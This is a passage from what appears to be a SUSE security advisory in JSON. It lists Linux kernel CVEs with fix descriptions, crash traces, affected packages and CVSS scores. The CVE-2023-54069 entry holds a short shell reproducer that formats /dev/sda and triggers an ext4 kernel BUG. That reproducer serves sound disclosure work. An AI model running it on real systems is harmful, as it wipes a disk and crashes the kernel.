"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54052"
},
{
"cve": "CVE-2023-54060",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54060"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommufd: Set end correctly when doing batch carry\n\nEven though the test suite covers this it somehow became obscured that\nthis wasn\u0027t working.\n\nThe test iommufd_ioas.mock_domain.access_domain_destory would blow up\nrarely.\n\nend should be set to 1 because this just pushed an item, the carry, to the\npfns list.\n\nSometimes the test would blow up with:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: 0000 [#1] SMP\n CPU: 5 PID: 584 Comm: iommufd Not tainted 6.5.0-rc1-dirty #1236\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n RIP: 0010:batch_unpin+0xa2/0x100 [iommufd]\n Code: 17 48 81 fe ff ff 07 00 77 70 48 8b 15 b7 be 97 e2 48 85 d2 74 14 48 8b 14 fa 48 85 d2 74 0b 40 0f b6 f6 48 c1 e6 04 48 01 f2 \u003c48\u003e 8b 3a 48 c1 e0 06 89 ca 48 89 de 48 83 e7 f0 48 01 c7 e8 96 dc\n RSP: 0018:ffffc90001677a58 EFLAGS: 00010246\n RAX: 00007f7e2646f000 RBX: 0000000000000000 RCX: 0000000000000001\n RDX: 0000000000000000 RSI: 00000000fefc4c8d RDI: 0000000000fefc4c\n RBP: ffffc90001677a80 R08: 0000000000000048 R09: 0000000000000200\n R10: 0000000000030b98 R11: ffffffff81f3bb40 R12: 0000000000000001\n R13: ffff888101f75800 R14: ffffc90001677ad0 R15: 00000000000001fe\n FS: 00007f9323679740(0000) GS:ffff8881ba540000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 0000000105ede003 CR4: 00000000003706a0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cTASK\u003e\n ? show_regs+0x5c/0x70\n ? __die+0x1f/0x60\n ? page_fault_oops+0x15d/0x440\n ? lock_release+0xbc/0x240\n ? exc_page_fault+0x4a4/0x970\n ? asm_exc_page_fault+0x27/0x30\n ? batch_unpin+0xa2/0x100 [iommufd]\n ? batch_unpin+0xba/0x100 [iommufd]\n __iopt_area_unfill_domain+0x198/0x430 [iommufd]\n ? __mutex_lock+0x8c/0xb80\n ? __mutex_lock+0x6aa/0xb80\n ? xa_erase+0x28/0x30\n ? iopt_table_remove_domain+0x162/0x320 [iommufd]\n ? lock_release+0xbc/0x240\n iopt_area_unfill_domain+0xd/0x10 [iommufd]\n iopt_table_remove_domain+0x195/0x320 [iommufd]\n iommufd_hw_pagetable_destroy+0xb3/0x110 [iommufd]\n iommufd_object_destroy_user+0x8e/0xf0 [iommufd]\n iommufd_device_detach+0xc5/0x140 [iommufd]\n iommufd_selftest_destroy+0x1f/0x70 [iommufd]\n iommufd_object_destroy_user+0x8e/0xf0 [iommufd]\n iommufd_destroy+0x3a/0x50 [iommufd]\n iommufd_fops_ioctl+0xfb/0x170 [iommufd]\n __x64_sys_ioctl+0x40d/0x9a0\n do_syscall_64+0x3c/0x80\n entry_SYSCALL_64_after_hwframe+0x46/0xb0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54060",
"url": "https://www.suse.com/security/cve/CVE-2023-54060"
},
{
"category": "external",
"summary": "SUSE Bug 1256379 for CVE-2023-54060",
"url": "https://bugzilla.suse.com/1256379"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54060"
},
{
"cve": "CVE-2023-54064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipmi:ssif: Fix a memory leak when scanning for an adapter\n\nThe adapter scan ssif_info_find() sets info-\u003eadapter_name if the adapter\ninfo came from SMBIOS, as it\u0027s not set in that case. However, this\nfunction can be called more than once, and it will leak the adapter name\nif it had already been set. So check for NULL before setting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54064",
"url": "https://www.suse.com/security/cve/CVE-2023-54064"
},
{
"category": "external",
"summary": "SUSE Bug 1256375 for CVE-2023-54064",
"url": "https://bugzilla.suse.com/1256375"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54064"
},
{
"cve": "CVE-2023-54066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb-v2: gl861: Fix null-ptr-deref in gl861_i2c_master_xfer\n\nIn gl861_i2c_master_xfer, msg is controlled by user. When msg[i].buf\nis null and msg[i].len is zero, former checks on msg[i].buf would be\npassed. Malicious data finally reach gl861_i2c_master_xfer. If accessing\nmsg[i].buf[0] without sanity check, null ptr deref would happen.\nWe add check on msg[i].len to prevent crash.\n\nSimilar commit:\ncommit 0ed554fd769a\n(\"media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54066",
"url": "https://www.suse.com/security/cve/CVE-2023-54066"
},
{
"category": "external",
"summary": "SUSE Bug 1256373 for CVE-2023-54066",
"url": "https://bugzilla.suse.com/1256373"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54066"
},
{
"cve": "CVE-2023-54067",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54067"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race when deleting free space root from the dirty cow roots list\n\nWhen deleting the free space tree we are deleting the free space root\nfrom the list fs_info-\u003edirty_cowonly_roots without taking the lock that\nprotects it, which is struct btrfs_fs_info::trans_lock.\nThis unsynchronized list manipulation may cause chaos if there\u0027s another\nconcurrent manipulation of this list, such as when adding a root to it\nwith ctree.c:add_root_to_dirty_list().\n\nThis can result in all sorts of weird failures caused by a race, such as\nthe following crash:\n\n [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI\n [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1\n [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014\n [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.279928] Code: 85 38 06 00 (...)\n [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206\n [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000\n [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070\n [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b\n [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600\n [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48\n [337571.281723] FS: 00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000\n [337571.281950] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0\n [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n [337571.282874] Call Trace:\n [337571.283101] \u003cTASK\u003e\n [337571.283327] ? __die_body+0x1b/0x60\n [337571.283570] ? die_addr+0x39/0x60\n [337571.283796] ? exc_general_protection+0x22e/0x430\n [337571.284022] ? asm_exc_general_protection+0x22/0x30\n [337571.284251] ? commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.284531] btrfs_commit_transaction+0x42e/0xf90 [btrfs]\n [337571.284803] ? _raw_spin_unlock+0x15/0x30\n [337571.285031] ? release_extent_buffer+0x103/0x130 [btrfs]\n [337571.285305] reset_balance_state+0x152/0x1b0 [btrfs]\n [337571.285578] btrfs_balance+0xa50/0x11e0 [btrfs]\n [337571.285864] ? __kmem_cache_alloc_node+0x14a/0x410\n [337571.286086] btrfs_ioctl+0x249a/0x3320 [btrfs]\n [337571.286358] ? mod_objcg_state+0xd2/0x360\n [337571.286577] ? refill_obj_stock+0xb0/0x160\n [337571.286798] ? seq_release+0x25/0x30\n [337571.287016] ? __rseq_handle_notify_resume+0x3ba/0x4b0\n [337571.287235] ? percpu_counter_add_batch+0x2e/0xa0\n [337571.287455] ? __x64_sys_ioctl+0x88/0xc0\n [337571.287675] __x64_sys_ioctl+0x88/0xc0\n [337571.287901] do_syscall_64+0x38/0x90\n [337571.288126] entry_SYSCALL_64_after_hwframe+0x72/0xdc\n [337571.288352] RIP: 0033:0x7f478aaffe9b\n\nSo fix this by locking struct btrfs_fs_info::trans_lock before deleting\nthe free space root from that list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54067",
"url": "https://www.suse.com/security/cve/CVE-2023-54067"
},
{
"category": "external",
"summary": "SUSE Bug 1256369 for CVE-2023-54067",
"url": "https://bugzilla.suse.com/1256369"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54067"
},
{
"cve": "CVE-2023-54069",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54069"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix BUG in ext4_mb_new_inode_pa() due to overflow\n\nWhen we calculate the end position of ext4_free_extent, this position may\nbe exactly where ext4_lblk_t (i.e. uint) overflows. For example, if\nac_g_ex.fe_logical is 4294965248 and ac_orig_goal_len is 2048, then the\ncomputed end is 0x100000000, which is 0. If ac-\u003eac_o_ex.fe_logical is not\nthe first case of adjusting the best extent, that is, new_bex_end \u003e 0, the\nfollowing BUG_ON will be triggered:\n\n=========================================================\nkernel BUG at fs/ext4/mballoc.c:5116!\ninvalid opcode: 0000 [#1] PREEMPT SMP PTI\nCPU: 3 PID: 673 Comm: xfs_io Tainted: G E 6.5.0-rc1+ #279\nRIP: 0010:ext4_mb_new_inode_pa+0xc5/0x430\nCall Trace:\n \u003cTASK\u003e\n ext4_mb_use_best_found+0x203/0x2f0\n ext4_mb_try_best_found+0x163/0x240\n ext4_mb_regular_allocator+0x158/0x1550\n ext4_mb_new_blocks+0x86a/0xe10\n ext4_ext_map_blocks+0xb0c/0x13a0\n ext4_map_blocks+0x2cd/0x8f0\n ext4_iomap_begin+0x27b/0x400\n iomap_iter+0x222/0x3d0\n __iomap_dio_rw+0x243/0xcb0\n iomap_dio_rw+0x16/0x80\n=========================================================\n\nA simple reproducer demonstrating the problem:\n\n\tmkfs.ext4 -F /dev/sda -b 4096 100M\n\tmount /dev/sda /tmp/test\n\tfallocate -l1M /tmp/test/tmp\n\tfallocate -l10M /tmp/test/file\n\tfallocate -i -o 1M -l16777203M /tmp/test/file\n\tfsstress -d /tmp/test -l 0 -n 100000 -p 8 \u0026\n\tsleep 10 \u0026\u0026 killall -9 fsstress\n\trm -f /tmp/test/tmp\n\txfs_io -c \"open -ad /tmp/test/file\" -c \"pwrite -S 0xff 0 8192\"\n\nWe simply refactor the logic for adjusting the best extent by adding\na temporary ext4_free_extent ex and use extent_logical_end() to avoid\noverflow, which also simplifies the code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54069",
"url": "https://www.suse.com/security/cve/CVE-2023-54069"
},
{
"category": "external",
"summary": "SUSE Bug 1256371 for CVE-2023-54069",
"url": "https://bugzilla.suse.com/1256371"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54069"
},
{
"cve": "CVE-2023-54070",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54070"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nigb: clean up in all error paths when enabling SR-IOV\n\nAfter commit 50f303496d92 (\"igb: Enable SR-IOV after reinit\"), removing\nthe igb module could hang or crash (depending on the machine) when the\nmodule has been loaded with the max_vfs parameter set to some value != 0.\n\nIn case of one test machine with a dual port 82580, this hang occurred:\n\n[ 232.480687] igb 0000:41:00.1: removed PHC on enp65s0f1\n[ 233.093257] igb 0000:41:00.1: IOV Disabled\n[ 233.329969] pcieport 0000:40:01.0: AER: Multiple Uncorrected (Non-Fatal) err0\n[ 233.340302] igb 0000:41:00.0: PCIe Bus Error: severity=Uncorrected (Non-Fata)\n[ 233.352248] igb 0000:41:00.0: device [8086:1516] error status/mask=00100000\n[ 233.361088] igb 0000:41:00.0: [20] UnsupReq (First)\n[ 233.368183] igb 0000:41:00.0: AER: TLP Header: 40000001 0000040f cdbfc00c c\n[ 233.376846] igb 0000:41:00.1: PCIe Bus Error: severity=Uncorrected (Non-Fata)\n[ 233.388779] igb 0000:41:00.1: device [8086:1516] error status/mask=00100000\n[ 233.397629] igb 0000:41:00.1: [20] UnsupReq (First)\n[ 233.404736] igb 0000:41:00.1: AER: TLP Header: 40000001 0000040f cdbfc00c c\n[ 233.538214] pci 0000:41:00.1: AER: can\u0027t recover (no error_detected callback)\n[ 233.538401] igb 0000:41:00.0: removed PHC on enp65s0f0\n[ 233.546197] pcieport 0000:40:01.0: 